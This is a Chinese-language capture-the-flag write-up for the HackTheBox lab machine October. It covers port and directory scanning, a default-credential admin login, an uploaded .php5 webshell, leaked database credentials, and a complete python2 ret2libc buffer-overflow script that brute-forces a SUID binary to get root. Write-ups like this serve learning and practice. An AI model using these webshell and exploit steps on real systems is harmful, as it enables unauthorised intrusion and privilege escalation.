打靶记录(一三五)之HTBOctober

端口扫描

┌──(mikannse㉿kali)-[~]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.16             
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-08 09:59 CST
Nmap scan report for 10.10.10.16
Host is up (0.067s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 13.57 seconds

┌──(mikannse㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 10.10.10.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-08 09:59 CST
Nmap scan report for 10.10.10.16
Host is up (0.066s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
|   2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
|   256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
|_  256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: October CMS - Vanilla
| http-methods: 
|_  Potentially risky methods: PUT PATCH DELETE
|_http-server-header: Apache/2.4.7 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|phone|storage-misc
Running (JUST GUESSING): Linux 3.X|4.X (90%), Crestron 2-Series (86%), Google Android 4.X (86%), HP embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/o:google:android:4.0 cpe:/h:hp:p2000_g3
Aggressive OS guesses: Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.16 (90%), Linux 3.16 - 4.6 (90%), Linux 3.18 (90%), Linux 3.2 - 4.9 (90%), Linux 3.8 - 3.11 (90%), Linux 4.2 (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.65 seconds

Web

是一个octobercms,稍微查看了一下历史漏洞，大部分都需要有更改文件的管理员权限才行，但是创建一个账户之后发现并没有新增的功能，扫一下目录

┌──(mikannse㉿kali)-[~/HTB/october]
└─$ gobuster dir -u http://10.10.10.16 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.16
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/blog                 (Status: 200) [Size: 4255]
/forum                (Status: 200) [Size: 9588]
/themes               (Status: 301) [Size: 310] [--> http://10.10.10.16/themes/]
/modules              (Status: 301) [Size: 311] [--> http://10.10.10.16/modules/]
/account              (Status: 200) [Size: 5089]
/tests                (Status: 301) [Size: 309] [--> http://10.10.10.16/tests/]
/storage              (Status: 301) [Size: 311] [--> http://10.10.10.16/storage/]
/plugins              (Status: 301) [Size: 311] [--> http://10.10.10.16/plugins/]
/backend              (Status: 302) [Size: 400] [--> http://10.10.10.16/backend/backend/auth]
/Blog                 (Status: 200) [Size: 4253]
/vendor               (Status: 301) [Size: 310] [--> http://10.10.10.16/vendor/]
/config               (Status: 301) [Size: 310] [--> http://10.10.10.16/config/]
/Forum                (Status: 200) [Size: 9590]
/error                (Status: 200) [Size: 3350]
/Account              (Status: 200) [Size: 5089]

发现一个后端/backend,发现admin:admin直接登进来了,那么现在就能试着利用上面的历史漏洞了。

能在media上传php文件，但是后缀要是.php5，写一个一句话木马进去

┌──(mikannse㉿kali)-[~/HTB/october]
└─$ curl "http://10.10.10.16/storage/app/media/shell.php5?cmd=whoami"
www-data

提权

在config的databases.php中找到数据库凭证,本地也确实开着一个mysql

'mysql' => [
'driver'    => 'mysql',
'host'      => 'localhost',
'port'      => '',
'database'  => 'october',
'username'  => 'october',
'password'  => 'OctoberCMSPassword!!',
'charset'   => 'utf8',
'collation' => 'utf8_unicode_ci',
'prefix'    => '',
],

查看backend表，得到了harry的哈希但是无法破解

|  1 | Harry      | Varthakouris | harry | harry@october.htb | $2y$10$4tBYxIpkBpR9.coxVUdeJetCp77EFLp1U2o/f2.wlKaBbe698aIzO | NULL            | NULL

但是找到一个可以的suid执行文件,ovrflw,像是可以缓冲区溢出,这台靶机是32位的

www-data@october:/tmp/october-1.0.412$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
< -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null           
-rwsr-xr-x 1 root root 67704 Nov 24  2016 /bin/umount
-rwsr-xr-x 1 root root 38932 May  8  2014 /bin/ping
<SNIP>
-rwsr-xr-x 1 root root 7377 Apr 21  2017 /usr/local/bin/ovrflw

似乎需要libc的内容，只好抄wp了(悲),python2跑一下这个脚本

import struct, subprocess
libcBase = 0xb75eb000
systemOffset = 0x00040310
binShOffset = 0x00162bac
libcAddress = struct.pack("<I", libcBase+systemOffset)
exitAddress = struct.pack("<I", 0xd34db33f)
binShAddress = struct.pack("<I", libcBase+binShOffset)
payload = "\x90"*112
payload += libcAddress
payload += exitAddress
payload += binShAddress
i = 0
while True:
i += 1
if i%10 == 0:
print "Attempts: " + str(i)
subprocess.call(["/usr/local/bin/ovrflw", payload])

碎碎念

下个月开始学二进制